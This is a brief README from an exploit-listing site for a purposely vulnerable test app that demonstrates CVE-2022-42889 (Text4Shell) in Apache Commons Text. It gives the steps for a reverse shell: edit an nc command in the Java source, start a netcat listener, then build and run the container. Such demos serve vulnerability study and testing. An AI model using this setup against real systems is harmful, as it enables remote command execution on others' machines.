## https://sploitus.com/exploit?id=02581350-72A7-51B5-AAEF-7A49545171B7
# CVE-2022-42889 Test application
This repository contains a simple application using Apache Commons Text < 1.10 which is vulnerable to CVE-2022-42889.
## Running the application
Replace `DemoApplication.java` nc command by your host ip address.
Listening with netcat:
```sh
$ nc -l -p 30000
```
Build and run docker vulnerable code
```bash
docker build . -t vulnerable-app
docker run vulnerable-app
```
As you can see netcat will be able to execute remote commands